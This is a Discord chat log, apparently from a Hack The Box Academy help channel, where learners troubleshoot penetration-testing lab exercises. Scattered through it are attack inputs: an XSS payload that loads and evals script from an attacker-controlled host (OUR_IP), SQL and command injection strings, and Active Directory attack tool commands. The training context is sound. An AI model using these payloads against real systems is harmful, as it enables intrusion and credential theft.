young ore
lost scroll
dusty cape
#

I think the Lateral Movement Section from Attacking Enterprise Networks is broken. I've tried to do a Host Discover and all the hosts are up except 172.16.8.50 . I need this host to use evil-winrm and move onto the next host. Can anyone verfiy that this problem exists? Is there someone that I can contact to fix this problem?

fathom pendant
#

I didn't have any issues moving around

fathom pendant
#

If you suspect an issue, reset the lab and get back to that point

#

Deleting the output bc spoilers

dusty cape
fathom pendant
#

It was when I did it months ago

#

Reach out to support

#

Change vpn regions, sometimes that fixes random errors

dusty cape
#

ok thanks

wild sage
#

Does anyone have the commands necessary to download the Default-creds-cheatsheet from the Password reuse/Default section? Trying to download it to my Parrot OS VM but the commands are for Kali

brazen python
#

hey guys I'm interested ethical hacking I would like to work of the government like some of those guys in the shows like in scorpion I'm asking for some guidance as I'm a beginner

fathom pendant
fathom pendant
compact patrolBOT
wild sage
fathom pendant
#

On the gh page?

#

Oh right

#

I didn't download thar

#

That*

#

I just used the website csv and ctrl-f

#

gh would generally be git clone

#

Also kali and parrot are both debian

#

So should be similar/same regardless

sly ledge
#

Hi

pearl gulch
#

yo can someone help me with one of the modules

#

its called web proxies

#

in the skill assensment section i need to send a request to a server using a custom cookie i get 31 characters of , then "fuzz" the last character using a wordlist from seclist called alpha-num.txt , after that encode it using base64 then ascII-hex then send it to the IP:PORT/admin.php

#

the problem is IDK if i should send it as a post request or as a Get request , i have tried them both and both ain't working , i am encoding the entire thing reversably after getting the MD5 hash

#

as the hint told me

#

its quite hard to explain writing this

#

i don't have discord on my linux and its kinda annoying to install it

#

also quick question why is there no voice chats ?

rustic sage
#

am starting my journey on introduction to infomation security foundations, module 2 that is leaning process last part learning progress, i am not able to answer the last qustion :What is the difference between the two numbers of the learning progress mentioned above? these are the figures (1.00)365 = 1.00
(1.01)365 = 37.7 and the hint is 37.7-1.00, i know one who had done it can relate. kindly i need help on this

fathom pendant
fathom pendant
#

And you can send as a GET or POST

#

After that you should check the results of each request until you see the flag

pearl gulch
#

i also did thats why i am confused , the response i get is a SET-cookie from the server along with the login screen from the IP:port/admin.php

fathom pendant
#

So step a -> b -> c to decode you do c -> b -> a to encode

pearl gulch
#

i first added the prefix , then added the payload to the payload simplest section (alpha-num-case.text) (which are numbers from 0-9-a-z-A-Z)
then encode as base64 , then encode as ASCII-hex

pearl gulch
fathom pendant
pearl gulch
#

yeah

#

and yes i counted 88 characters too

fathom pendant
#

I didn't count the characters

pearl gulch
#

i didn't at first then i did because the hint says so

rustic sage
#

am grateful. am sorted

fathom pendant
#

But when you have it highlighted, you have the entire cookie value portion highlighted when you go to send the payload yeah?

pearl gulch
fathom pendant
#

Also this may sound dumb @pearl gulch , but try resetting the target

pearl gulch
#

i have

#

for the 7th time now xD

fathom pendant
pearl gulch
#

cookie : sessionid=§§

pearl gulch
#

either i am high or something is high

fathom pendant
#

Just to be safe

#

It might not like it being empty

pearl gulch
#

bruh

#

ok let me try

#

bruh let me just install discord on linux

fathom pendant
#

You won't be able to screenshot anyway

#

You need to link your account via the directions in #welcome to post images/screenshot

cinder mason
#

ok ?

#

btw its me its just my other account

#

about to try it one moment

#

nope same thing

fathom pendant
#

reach out to support then ¯_(ツ)_/¯

#

Green bubble on website

fading olive
#

Hello,
I'm having trouble with Command Injections > Identifying Filters.

I'm using ZAP proxy to fuzz the POST request with different operators and their url-encoded version. I'm also adding the whoami command at the end to see if the server actually does execute it. My problem is that I never see the output of the command, it's either an error or the simple ping output.

I suspect it's because of how ZAP encodes my payload, so I also tried with curl on the command line and it's the same problem.

I think what could help me is a hint of a curl command that would work, or of how to specify encoding in zaproxy...

cinder mason
fathom pendant
cinder mason
#

uh what is "account identifier" ?

fathom pendant
cinder mason
#

got it

#

i can send pictures :))

fading olive
cinder mason
#

if anyone finds the problem please @ me

knotty anvil
#

hi, im in kerberos attacks module doing Unconstrained Delegation - Users and i cant RDP into the box

#

this is the 3rd time i try

#

I am able to authenticate with all the linux modules though

jagged zenith
acoustic solar
#

Hello all. I'm going through the CPTS path, currently I'm on the last Attacking Enterprise Networks module. Today I finished Internal Information Gathering section but I have noticed something strange and I can't explain it to myself. I set up dynamic port forwarding using SSH. When I tried to verify if everything is ok by using nmap (using -Pn -sT) scan against ports of the already compromised host, but with the second IP of the NIC interface I got that these services are filtered . I looked the firewall rules to check if there any rules for the second interface but didn't find anything, checked also if the host is part of AD, but it isn't. After a while I decided to take a look at the walkthrough from the section and noticed that they used the same approach, but on their nmap result the ports are opened. Probably they made some changes on the box but didn't updated the walk through. Anyway, I'm just wondering if anyone can explain me why I see these services as filtered although they are opened and there are no FW rules. Is it related to the proxychains do I miss something. Sorry for the long explanation. Would appreciate your help!

signal topaz
#

Hey, has anyone managed to identify the second vulnerability in the "Intro to Whitebox Pentesting" module? (skill assessment)
||I've successfully read the flag via the /ping endpoint||

acoustic solar
acoustic solar
analog dock
cold marsh
#

hey guys, why rubeus does not works?

lusty thicket
cold marsh
#

to make sure im using right version, could you suggest me where i can download it?

fathom pendant
#

@unreal tartan . this channel

acoustic solar
#

I just want to inform you for my case. I decided to perform the dynamic port forwarding from my kali VM, using the exact same approach, scanning services now returned open . parrot nmap version is 7.94SVN kali nmap version is 7.93 proxychains on both machines is 4.16-2 I went back to parrot os and downgraded the nmap version to 7.93 and now proxychains nmap works perfectly it shows the ports as open. I guess there are some issue with nmap 7.94SVN

acoustic solar
# analog dock Kali on top

I like it more too. But when I don't use my personal PC I use the provided box from HTB. Anyway I'm glad I was able to fix it there as well, almost all day I was pulling my hair 😄

ancient niche
#

Good Afternoon people. Someone can help me with that?

frozen gorge
#

could anyone help with alert machine? i found the vulnerability and got the admin to press link but something is wrong w my payload idk what tho

ancient niche
#

i can't find the flag.txt of module File inclusion

#

hello?

analog dock
#

HELLO??!!!

lusty thicket
#

hello

fathom pendant
ember tide
#

Good way to improve on HTB?

fathom pendant
fathom pendant
#

¯_(ツ)_/¯

#

Being a noob doesn't excuse you

ancient niche
#

do youuu?

#

oh my good

fathom pendant
#

?

lusty thicket
ancient niche
#

i don't know how put in the flag.txt

lusty thicket
ancient niche
#

too i want that

#

neither i want that

safe star
#

Type shi

cold pilot
#

hey did you ever figure this out?

cinder mason
lusty thicket
cinder mason
#

yeah same thats why i am asking 😦

sand vector
#

Has anyone had an issue with the nmap scripting engine question and getting a no file error for the text file?

tired dawn
#

Hey friends,
I'm 6 weeks in my cyber journey, and as one should, I'm finding this whole thing fun but challenging.
Is there newbies like me who are looking to work on boxes together, kinda of like a study group?

I feel like bouncing ideas would be a great way to advance through these challenges without the help of writeups

Hopefully this is the right forum for those types of questions.
If interested DM so we can setup a room.

Cheers

Tchou

tired dawn
lime oyster
#

hello guys i need help on "Footprinting Lab - Hard" what i did so far that i tried to connect to the pop3 service and imap service and i found ssh cerficate but i think it is useless since it is not the private key . i found SNMP open but everytime i enumrate it i get "no connection "

analog dock
#

Ok

lime oyster
little eagle
#

Salutations

quasi wave
#

for the pass the ticket from linux section of password attacks I am logged in as Carlos and I got his crontab and I see a script in his crontab

#

I run it but it starts to take long to run and there's a results file so

little eagle
#

What would you all say,is the HARDEST thing in technology

lusty thicket
little eagle
#

And which coding language is it

lime oyster
quasi wave
#

I stop the script as I don't know if it will get the results I'm looking for in the file

lusty thicket
quasi wave
#

I'm trying to get the creds for svc workstations

#

so will running that script get me that and store it in results file?

lime oyster
dark hedge
little eagle
#

I can't talk in general after verifying and everything,I'm not sure how,it made me talk here in module's

#

Oh wow I can't spell

dark hedge
#

you must verify your account by using the /identify command with your account identifier from app.hackthebox.com

lime oyster
lusty thicket
quasi wave
#

ok so a while ago I got the flag in the svc_workstations directory but

#

how do I get into svc_workstations account?

#

which is the next question because I need to ssh into that

#

in order to be able to use sudo for privesc

lusty thicket
safe star
harsh gorge
#

on the skills assement for xss im trying to get a cookie but the webserver keeps throwing GET script.js and doesnt even return the document cookie

safe star
harsh gorge
#
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
quasi wave
#

I am trying to figure out how to get the ticket

#

the kerberos ticket

#

for svc_workstations

safe star
#

Which one are u sending?

dark hedge
#

i believe top is script.js, bottom is index.php

harsh gorge
#

the bottom one is my xss payload calc

dark hedge
#

oh, i am misread

safe star
#

Just use src=IP catHiss

harsh gorge
#

Tf you mean src=IP

dark hedge
#

maybe try a different payload

safe star
#

Yeah and try the image payload

dark hedge
#

and check if you actually put your ip address in script.js

lusty thicket
safe star
quasi wave
#

can someone give me a hint as to what I need to do to get password in order to ssh in as svc_workstations?

quasi wave
dark hedge
#

i don't recall there being any HttpOnly flags set in the Skills Assessment

quasi wave
lusty thicket
#

i might be wrong 😉

quasi wave
#

its not in tmp folder

#

in fact svc_workstations is not listed there

safe star
quasi wave
safe star
#

So it must be in a keytab or something

quasi wave
#

ok

#

where can I look? I wrongly assumed twice it would be in /tmp

quasi wave
#

aside from you telling me that but also its like I check Carlos's keytab and its not there either

#

I'm kind of confused

safe star
#

Been a while, lemme see

#

What section?

lime oyster
#

hello guys i need help on "Footprinting Lab - Hard" i have the tom user and password found on ||snmp|| i tried to curl imap ||curl -k 'imaps://10.129.108.34/' --user tom:pass -v|| but i found nothing , any help ?

#

please

lusty thicket
analog dock
lime oyster
lime oyster
#

found ssh key i tried to connect with it but i think it is public key

analog dock
analog dock
#

Lol

lime oyster
#

i tried to do chmod 600 to id_rsa file but i think i did something wrong

#

maybe generating a new keys ?

lusty thicket
#

no

lime oyster
#

what

analog dock
#

Make sure it’s properly formatted

lime oyster
#

okay wait

#

i got this

analog dock
#

I said root

#

Not Tom

lime oyster
#

the password is that

analog dock
#

?

lime oyster
#

i found it on SNMP

analog dock
#

Yes that’s for tom

#

That’s how you login to imaps and get the ssh key

#

Then you ssh as root

#

Not tom

safe star
#

Theres another file in the directory

lime oyster
#

thank you

compact matrix
harsh gorge
#

Just do what Session Hijacking taught you and thatll be it

analog dock
compact matrix
#

i finished the entire CBBH path, how should I revise now to ensure I know what im doing

harsh gorge
#

yeah it just kinda hangs for me

thorn urchin
#

thats person to person dependent

#

thats just 'how well did you grasp the material?'

gray yacht
lusty thicket
thorn urchin
#

yes, some things more so than others

lusty thicket
#

so you agree there are situations where the answer is clearer or more defined

#

in this case, there'll be no need to be dismissive

thorn urchin
#

Nobody can tell them if theyre ready or not

#

or what they need to still work on

lusty thicket
#

someone might think that is a question worth answering in a concrete step by step fashion

thorn urchin
#

if you think im wrong then answer the question, what should they revise to ensure theyre ready?

lusty thicket
#

i haven’t done the path so i wouldn’t know

thorn urchin
#

lmao

#

so I say "nobody can answer that for you because nobody but you knows how ready you are" and you disagree but have zero things to actually add

#

👍

lusty thicket
#

so in your own words readiness is a personal judgement

#

you can only assess your own knowledge and no external party can judge how prepared you are?

thorn urchin
#

thats what exams are for. the question was how they could ensure they know theyre ready. and the answer is nobody can do that for them. they need to sit down and judge the confidence of their own knowledge

#

Im not being dismissive, im saying the answer is looking inward

dark hedge
lusty thicket
#

but you’re definitely falling into the trap of oversimplification

thorn urchin
#

why tf you arguing when you have nothing to contribute to the discussion

#

you dont like my advice but have none to offer of your own, noted.

lusty thicket
#

it’s not your advice lol

#

it’s about acknowledging there’s a better approach to revision

thorn urchin
#

to which you didnt offer one

lusty thicket
#

i don’t need to?

thorn urchin
#

then shut up lmao

#

youre spamming up the channel

lusty thicket
#

i’m saying revision isn’t a one size fits all process

thorn urchin
#

dont care. move along

lusty thicket
#

alright buddy

harsh gorge
#

okay I dont know where to go with this skill assement i tried the payloads they gave me but no luck

thorn urchin
#

9/10 times its because you should craft a payload from what you learned, not necessarily one of the examples they gave you

#

which module

harsh gorge
#

sql injection

#

kind of hard to construct a payload when all it says is invalid credentials

thorn urchin
#

ah that part, youre overthinking things. just be more thorough

harsh gorge
#

ive tried ' or '1'='1

#

and every variation of it

thorn urchin
#

not enough variations

harsh gorge
#

i dont know what to do lmao

thorn urchin
#

unfortunately youre close enough that there really isnt any advice that isnt just telling the answer

#

youre on the correct track

harsh gorge
#

im so stuck

#

db.sql isnt the answer is it?

safe star
thorn urchin
#

its my specialty lul

harsh gorge
#

i refuse to look up the answer

thorn urchin
harsh gorge
thorn urchin
#

your brain. think em up

tender nimbus
#

Hey guys quick question about burp, i need to set my proxy when i launch a auxiliary from msf (to check for robots.txt file), and look in burpto the request it makes, and i need to give the last line of the request they sey "it starts with "msf"" but in my request i don't have tat any idea? module web proxies

lusty thicket
harsh gorge
thorn urchin
#

sqlmap doesnt work for that part anyways

lusty thicket
harsh gorge
thorn urchin
#

as they should

lusty thicket
harsh gorge
#

maybe its a diffrent dbms

lusty thicket
safe star
harsh gorge
safe star
#

Think super super simple

harsh gorge
#

ive tried or 1=1 it doesnt work

thorn urchin
#

exact syntax is important

lusty thicket
#

no shit

thorn urchin
#

its a reminder, go away troll

safe star
tender nimbus
harsh gorge
harsh gorge
thorn urchin
#

not contributing anything but complaining about others is their specialty

#

I have the exact payload in my notes lol the goal is to get vader to realize their own mistakes and discover the solution themselves

lusty thicket
#

awesome

thorn urchin
#

congrats

harsh gorge
#

Hashtag is a hell of a drug

thorn urchin
#

didnt use one in my payload but more than one way to skin a cat

hollow charm
#

In section "LLMNR/NBT-NS for windows" in Active directory Enumeration and Attack module

No matter how long I wait, any NTLM hash doesn't appear on the console.
has anyone resolved it??

lusty thicket
hollow charm
#

I used inveigh in the same way the section material says,

Import-Module C:\Tools\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

It captures LLMNR, NBNS, DNS messages well but not NTML hash

safe star
#

Are you running as admin?

lusty thicket
thorn urchin
#

how long did you wait too? its been awhile but I vaguely recall one of those modules having awhile before the hash showed up

hollow charm
harsh gorge
#

am i supposed to be reading dashboard.php

#

or is that a non sequitor

#

wait got it

flat patrol
#

If anyone has been here, I am stuck. Just a nudge on question 3 might be enough to get me to question 4 and so on... if you are out there, please help.

#

Information Gathering - Web Edition | Final Assesment

harsh gorge
cloud urchin
#

those hosts have to be wrong

#

.htb is a fake tld, you're pointing it to a real IP

#

could be totally wrong as i didn't do that update module but i've never seen a htb module setup like that

ocean night
#

It's a subnet used for challenge / docker spawns, so could be legit

harsh gorge
#

it is

ocean night
#

but I don't know for sure either, sorry

cloud urchin
#

alright fair enough don't listen to me

ocean night
#

Nah you're good

flat patrol
#

It's cool, I don't know shit either.

ocean night
#

One of us, one of us

#

😄

flat patrol
ocean night
#

As for a wordlist of choice, if it's from a module, I'd imagine they would hint to a wordlist to use in there - you shouldn't have to use a top 1 million least at the least

flat patrol
#

I use gobuster vhost with -t 200 at the end and it flies pretty quick

ocean night
#

Our poor cluster

#

😅

#

Got a link to the module / section?

flat patrol
ocean night
#

Nice one 🙂

unreal tartan
viral snow
#

Were you able to figure this one out? I'm getting a connection but no DC01 ticket.

cloud urchin
#

he was using the wrong credentials i believe

gray yacht
#

I thought you were given one vhost, a target IP, and port?

viral snow
#

I'm stuck like chuck on this one. How did you extract the TGS ticket of DCO1$?

I'm getting a connection, but no TGS ticket.

#

Were you able to figure this one out? I'm stuck in the same spot you were in. Any help?

sweet jewel
#

just waited 10 minutes for DNS to recache

pine dome
#

Hi, who can give me a hint in Advanced SQL Injection Skill assessment (RCE)? It seems that CREATE function doesnt work. I read the hints from the history, tried to exploit using sessions from the different users, but the create function seems not work at all

flat patrol
# ocean night Nice one 🙂

Question 4 and 5 are now solved using ReconSpider and adding www.inlanefreight.htb to the hosts file, now I just need to figure out question 3 and I can be done. At least I made progress tonight.

gray yacht
opal flume
#

hello, i stuck on mitm for access to private api, someone know how to acces?

rustic sage
cloud urchin
#

kirbi2hashcat?

rustic sage
pseudo kiln
#

Is there a section in the module where we can practice PetitPotam or we have to find a machine/lab it ?

#

I don't recall, but from the modules I think we could only practice nopac

autumn pilot
#

Keep it simple, pillage what you can and use that

#

also, tools that can generate payloads can come handy

#

Don't look for CVE's just yet

safe star
#

whats EoP

autumn pilot
#

Elevation of Privilege

safe star
#

oh

autumn pilot
#

Do you have the necessary privileges for them to work?

safe star
#

the first skill assessment?

#

-c flag

#

juicypotato

#

i gave you all thats needed

autumn pilot
#

Not sure, I'm confused as you mentioned the final assessment of the module and later on it turns out to be the first skills assesment

undone narwhal
granite canopy
#

I need help with the skill assessment for Parameter Logic Bugs. I have a hard time finding || A function which I can use to get free subscriptions||

pseudo kiln
ruby vector
#

Hey there, having trouble during the web proxies module:

I'm currently doing the web proxy module from the academy,
typing this in the command prompt
nmap --proxies http://127.0.0.1:8080 SERVER_IP -p55379 -Pn -sC
It gives me the result of the scan but nothing can be found on the burp's history
If anyone know why, I'll be glad to read you ^^

#

I tried with proxychains command and it outputs me the same

safe star
#

dm the command

ruby vector
hollow charm
#

In module "Password Spraying - Making a Target User List", i should enumerate user list in domain with kerbrute tool to solve the problem

for example,
"kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt "

in this problem, how can i know the domain controller's IP??
has anyone solved it?

autumn pilot
#

By scanning the network

hollow charm
granite canopy
fading olive
#

Hello, I'm doing Command Injections > Identifying Filters
The web server runs a ping command and I'm supposed to inject it by fuzzing different operators and their url-encoded version:
1.1.1.1;whoami
1.1.1.1&&whoami
My problem is that none of the commands work. I'm using ZAP and I either get a response saying "Invalid input" or I just get the result from the PING command and never the result from the whoami command.
Can anybody explain what I'm doing wrong?

torn skiff
#

in windows attack and defence, the vm does not have the 'passwords.txt' dictionary file and I cant seem to find any reference to it. Any help? Am i missing something?

vocal rover
#

Hi,

Path: Penetration testing (JOB ROLE)
Module: Information gathering
Section: DNS Zone Transfers

I'm stuck at following question.
Q.After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.

For zone transer I need NS record of DNS server but it is not retriving any record of NS. I tried added IP to hosts file, tried using random NS server like ns1, ns2 but failed.

acoustic owl
#

No, you do not need an NS record. You need a nameserver. The target IP is the nameserver

rustic sage
#

Hi guys

#

Please answer a question for me. I'm finishing some machines, but I'm not earning any points. Does anyone know why?

glacial minnow
#

hi, i cant run any OS commands usng PowerUpSQL PS C:\Tools> Invoke-SQLOSCmd -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -Command "whoami" VERBOSE: Creating runspace pool and session states VERBOSE: Closing the runspace pool

#

i cant run from linux only powershell host

#

im doing this section from AD module

#

basically they misconfigured the ssh, so you can't ssh to the linux attack host they mentioned

#

my only option is from Windows with PowerUpSQL, but the command in the SS does not return anything.

#

i confirmed the sql server is running

green minnow
#

Anyone ran into these issues when trying to get ODAT working?

#

asyncore is depricated and you can't pip install it anymore

#

Module is Oracle TNS section of footprinting

#

pip install pyasyncore

ashen herald
#

hashcat -m 11600 -b
hashcat (v6.2.6) starting in benchmark mode

Benchmark relevant options:

  • --optimized-kernel-enable

  • Hash-Mode 11600 (7-Zip) [Iterations: 16384]

Speed.#1.........: 299 H/s (51.06ms) @ Accel:64 Loops:4096 Thr:1 Vec:8

I might need an help from a gpu-equipped fella :°D => ref: Extract the hash from the attached 7-Zip file, crack the hash, and submit the value of the flag.txt file contained inside the archive.

fallow kernel
#

Guys I have a question about subdomain enumeration.
I add the IP and domain name to my /etc/hosts file and then use ffuf to enumerate for subdomains. But it does not find anything. Only when I add the subdomain to the /etc/hosts file (because I know it is there), ffuf is able to find it (but then ofcourse I already know it exists).
Could someone explain me what I am doing wrong?

flat patrol
fallow kernel
#

Well it just in general with subdomain enum. I add the domain.htb to my hosts file and use ffuf against FFUF.domain.htb and it does not find anything.
But when I add like dev.domain.htb and use FFUF.domain.htb it then finds the dev subdomain but then I already know it exists right. My question is why it won't come up when I only have the domain.htb in my hosts file

urban elk
#

look up the difference between subdomain and vhost enumeration

flat patrol
fallow kernel
green minnow
#

Well apparently ODAT is still borked

thorn vale
#

Any one will to help sqlmap skills assessment

sonic plume
#

oh my bad

sonic plume
thorn vale
flat patrol
fallow kernel
green minnow
#

is ODAT not installed on pwnbox?

#

Is pwnbox internet slow or something I tried installing odat using the script provided in the foot printing module and it wouldn't connect to the parrot repo to download stuff or clone the GitHub repo

#

And can't wget the required oracle package either

chilly slate
#

is there possiblity to reset the progress on job role path? I wanted to go through it again.

storm elk
#

No. But you can do the modules again one by one

pine dune
#

Hi guys how can I test which parameter is vulnerable to sqli?

analog dock
#

You tell me

pine dune
#

apparently theyre both vulnerable

#

I managed to login successfully as admin but not tom

#

weird

fair mural
#

I am on the skill assessment for the pivoting, tunneling, and port forwarding. I am not stuck hust wondering why this isn't working properly and I've already done everything Chatgpt has recommended me doing. I did a for loop ping sweep and found two hosts up on the internal network. I am trying to run nmap through proxychains to scan the individual IPs I found but nmap is only showing the ports as open when I scan them individually. For example, proxychains nmap -v -sT -Pn -p 1-4000 -T4 172.16.5.0 returns that no ports are up, but proxychains nmap -sT -Pn -p 3389 172.16.5.0 shows that rdp is running. Any idea why this is or a fix?

compact matrix
#

then put random username and sql payload in password

chilly slate
idle ore
#

hi guys

#

im new here

#

can i have some advice

#

if any one minds

#

guys how many cubes u have in (hack the box)

flat patrol
# gray yacht To answer that you have everything you need. It's just a matter of thinking very...

I cannot get tp robots.txt for the life of me. It's the last question and then I am done with Information Gathering - Web Edition final assessment. If I try things like dig inlanefreight.htb:port TXT I geet nada so I try the and all the other domains like the aws and nada. I can't figure out where it is hiding. + 1 Question 3 "What is the API key in the hidden admin directory that you have discovered on the target system?" So it must be inlanefreight.htb right? I mean I am a brain cancer survivor and this stuff kicks my butt as bad as some other peeps here. It's gotta be simple like you said, so where am I going wrong? whois isn't an option, dnsenum fails with NS record query failed: NXDOMAIN, wget gives me junk headers, not all of that is relevant, I just think I am missing something, do you have any extra advice?

normal raft
#

is there an IA pentesting tool or a module on it

worn matrix
#

what is the best worth module for 500 cubeS?

lusty thicket
pine dune
silk cedar
#

@jolly yacht

#

@jolly yacht

jolly yacht
#

?

silk cedar
#

@jolly yacht I'm tackling task 1. It's tough! Have u made any progress?

jolly yacht
#

yeah, completed

#

tip: you dont need to print it

#

try otherways to retrieve the decoded value, which is obvious

upper ruin
#

intruder -> cluster bomb and set payloads on each parameter

rustic sage
#

Is OSCP still helpful in getting jobs?

storm elk
rustic sage
#

Sorry I though that this was general chat

alpine ingot
storm elk
#

Because you didn’t read and follow instructions in #welcome

#

Follow them and you’re in 😄

alpine ingot
#

ahh. lol

storm elk
#

You got this 💪

alpine ingot
#

🎉

winter schooner
#

Need help on Active directory enum and attack, Skills assessment 2, The question where i have to get admin on MS01,

gray yacht
winter schooner
gray yacht
knotty anvil
#

Hi can I get a nudge on kerberos attacks - skills assessment I have identified the machine that has unconstrained delegation, but Im stuck on what to do next from here

#

I need to find a username, but ive tried everything in the module so far. But maybe im missing something

#

I dont have access to powershell yet

ancient niche
#

guys I'm still haven't found the solution

#

😦

rustic sage
#

Guys please can someone help me? In the Password Attacks module I have one question left. How many users did you collect ? How do I have to submit the answer? Write every user by name? A number? or WHAT?

#

Andy I have also issue in understanding this question? How you have to submit the answer in number? Making a list of users separated by commas, colons etc? Or What?

#

I am having the same problem? I can't understand what do they want from me? How to submit the answer? In letters in numbers? Or how?

gray yacht
rustic sage
gray yacht
alpine ingot
#

Hey guys i have a question. I have a blog where i write about different projects i do in cybersecurity and i was wondering if i could create a pentest report for the AD Enumeration & Attacks - Skill Assessment parts, is this allowed or will HTB try to sue me?

quasi bridge
#

Security Monitoring & SIEM Fundamentals - SIEM Visualization Example 4

Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Extend the visualization we created or the "User added or removed from a local group" visualization, if it is available, and enter the common date on which all returned events took place as your answer. Answer format: 20XX-0X-0X

Hello and what’s wrong with this question? No date that I get from it is correct, is there a different code for returned events than 4732,4733?

winter schooner
somber hawk
#

me staring at the penetration tester path cost knowing my dreams are over: prayge

dark hedge
compact matrix
#

yes

#

go to billing

somber hawk
#

i only found the purchase cubes option which only had 2 subscriptions, had no idea

mint verge
#

where did u see the paths at? the website?

somber hawk
dark hedge
compact matrix
#

you must have one

somber hawk
#

yh, i noticed

dark hedge
somber hawk
#

well thankfully i stil have access to the other patha

somber hawk
#

oh well thats good, i can definitely provide the needed information, thanks!!!

mint verge
#

oh wow this is actual company. i thought someone just made this server for the jokes

dark hedge
#

yep, this server is run by HTB themselves

mint verge
#

theres a lot of courses. i dont know which to pick. which one do u recommend if i wanted to do ethical hacking

dark hedge
#

you can choose either the penetration tester path or the bug bounty hunter path

mint verge
#

word. thank u. $490 for each course?

dark hedge
#

$490 is for the Silver Annual sub

#

that sub gives you access to both of those paths + an exam voucher

mint verge
#

ohh. last question

#

how many time can i take the exam? do i have to pay each time?

dark hedge
#

an exam voucher gives you two (2) exam attempts

mint verge
#

word. thanks!

dark hedge
#

but in order for you to have a second attempt if you fail, you have to submit a report for your first attempt

mint verge
#

ahh i get. then if i fail both times=more money

dark hedge
#

yea. you'll have to pay for another exam voucher

mint verge
#

which would be another $490? or those sold separately

analog dock